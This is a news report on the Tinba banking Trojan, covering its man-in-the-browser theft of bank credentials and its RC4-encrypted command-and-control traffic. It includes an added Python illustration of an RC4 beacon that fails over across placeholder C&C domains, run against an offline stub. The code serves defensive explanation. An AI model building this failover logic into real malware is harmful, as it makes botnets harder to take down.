Tinba, a newly discovered banking Trojan, has been observed in man-in-the-browser attacks that circumvent two-factor authentication to steal sensitive data, including credit card information, from Internet Explorer and Firefox users.
Tinba is the smallest Trojan banker we have ever encountered and it belongs to a complete new family of malware that we expect to be battling in upcoming months.
Peter Kruse, partner and security analyst, CSIS Security Group A/S
Tinba, also known as Zusy, was analyzed by Danish security firm CSIS Security Group A/S and is drawing interest from malware analysts because of its small size. Its code is only 20 kilobytes, and it slips past some antivirus engines without relying on advanced encryption.
“It hooks into browsers and steals login data and sniffs on network traffic,” wrote Peter Kruse, partner and security analyst at CSIS, in a blog post describing the Tinba analysis.
The cybercriminals behind the malware have used it in limited attacks, trying to keep it out of sight of security researchers for as long as possible. “Tinba, like its equals, targets financial websites, but only a very small list of specific URLs,” Kruse wrote. The firm declined to name the financial websites targeted in the attacks.
The attackers target users of Microsoft Windows, and some Tinba components share similarities with the notorious Zeus malware family. Tinba injects code into the browser (the man-in-the-browser technique), enabling it to steal account credentials, credit card data and other authentication information as the victim enters them.
“Tinba is the smallest Trojan banker we have ever encountered and it belongs to a complete new family of malware that we expect to be battling in upcoming months,” Kruse wrote.
The CSIS researchers found that the Tinba Trojan attempts to communicate with four command-and-control (C&C) domains, encrypting the traffic with the standard RC4 stream cipher. “This is done to avoid one domain from being nonresponsive and thus losing communication with its drones. If the first domain does not respond properly, Tinba simply moves on to the next domain down the chain,” Kruse wrote.
CSIS blocked access to all the known Tinba C&C servers, according to Kruse.
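To make the C&C behaviour concrete, here is an added illustration of a fallback chain like the one Kruse describes. It is not Tinba's code: the RC4 routine is the textbook algorithm (checked against the published "Key"/"Plaintext" test vectors), while the key, the domain names, the acknowledgement format and the offline stub transport are all hypothetical values constructed for the example. An analyst who has recovered the real key from a sample could reuse the same RC4 routine to decrypt captured traffic.

```python
"""RC4-encrypted beacon with failover across a fixed C&C domain list.

Added illustration, not Tinba's code. Key, domains, ACK format and the
transport stub are hypothetical; no network traffic is generated.
"""


def rc4_ksa(key: bytes) -> list:
    """Key-scheduling algorithm: permute S[0..255] under the key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt (RC4 is symmetric): XOR data with the PRGA keystream."""
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Hypothetical values for the illustration; none are real Tinba indicators.
CC_DOMAINS = ["cc1.example.invalid", "cc2.example.invalid",
              "cc3.example.invalid", "cc4.example.invalid"]
RC4_KEY = b"example-key"
ACK = b"OK"


def beacon_with_failover(domains, key, payload, send):
    """Walk the hard-coded domain chain in order.

    `send(domain, ciphertext)` is the transport; it returns the raw reply
    bytes, or None when the host is unreachable.  Returns (domain, plaintext
    reply) for the first domain whose reply decrypts to a valid ACK, or
    (None, None) when the whole chain is exhausted.
    """
    ciphertext = rc4_crypt(key, payload)
    for domain in domains:
        reply = send(domain, ciphertext)
        if reply is None:
            continue                      # unreachable: move down the chain
        plaintext = rc4_crypt(key, reply)
        if not plaintext.startswith(ACK):
            continue                      # reachable but not a valid C&C reply
        return domain, plaintext
    return None, None


def make_stub_transport(live_domain: str, key: bytes):
    """Constructed offline stand-in for the network.

    cc1 is down (None); cc2 answers, but with something that does not decrypt
    to an ACK (a sinkhole that merely accepts the connection would fail the
    same check, its reply decrypting to random bytes); `live_domain` answers
    with a properly encrypted ACK.
    """
    def send(domain: str, ciphertext: bytes):
        if domain == live_domain:
            return rc4_crypt(key, ACK)
        if domain.startswith("cc2."):
            return rc4_crypt(key, b"not a C&C reply")
        return None
    return send


if __name__ == "__main__":
    transport = make_stub_transport("cc3.example.invalid", RC4_KEY)
    print(beacon_with_failover(CC_DOMAINS, RC4_KEY, b"id=1234", transport))
```

The design point for defenders is in the loop: a host that answers but does not speak the protocol is treated exactly like a dead one, so sinkholing or blocking only the first domain simply pushes the bot to the next entry. Every domain in the chain has to be blocked together, which is what CSIS did with the known servers.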
Banking Trojans have tormented the financial industry for years, and the easy availability of the Zeus crimeware kit has fueled the attacks. Attackers target the customers of firms that offer online banking, tricking the user with a spoofed website or injecting code into the legitimate session to capture credentials as they are typed. Ultimately, the cybercriminals attempt to drain their victims' accounts. Banking malware commonly spreads through phony emails that spoof a known financial institution.
More recently, the SpyEye crimeware toolkit has been a problem. The source code of both the SpyEye and Zeus toolkits has leaked, enabling savvy cybercriminals to build variants that combine elements of both malware families. SpyEye and Zeus are known for evading the transaction monitoring systems banks use to flag anomalous account activity.